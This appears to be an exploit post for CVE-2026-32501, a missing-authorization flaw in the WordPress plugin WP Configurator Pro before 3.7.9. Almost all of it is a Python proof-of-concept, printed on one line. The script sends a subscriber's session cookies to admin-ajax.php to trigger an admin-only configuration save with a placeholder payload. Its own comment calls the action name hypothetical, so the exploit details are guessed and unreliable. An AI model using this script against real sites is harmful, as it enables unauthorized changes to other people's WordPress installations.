CVE-2026-32501 WP Configurator Pro权限绕过漏洞

# Exploit Title: WP Configurator Pro < 3.7.9 - Missing Authorization PoC # Description: This script demonstrates how a low-privileged user can trigger an admin-only action. import requests def exploit(target_url, cookies): # The vulnerable endpoint is often wp-admin/admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload for the vulnerable action (action name is hypothetical based on plugin structure) data = { "action": "wpc_save_configuration", "config_data": "malicious_payload" } try: response = requests.post(ajax_url, data=data, cookies=cookies) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Vulnerability exploited successfully!") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or target is patched.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "http://example.com" # Cookies from a low-privileged user session (e.g., Subscriber) user_cookies = {"wordpress_logged_in_12345": "subscriber_session_token"} exploit(target, user_cookies)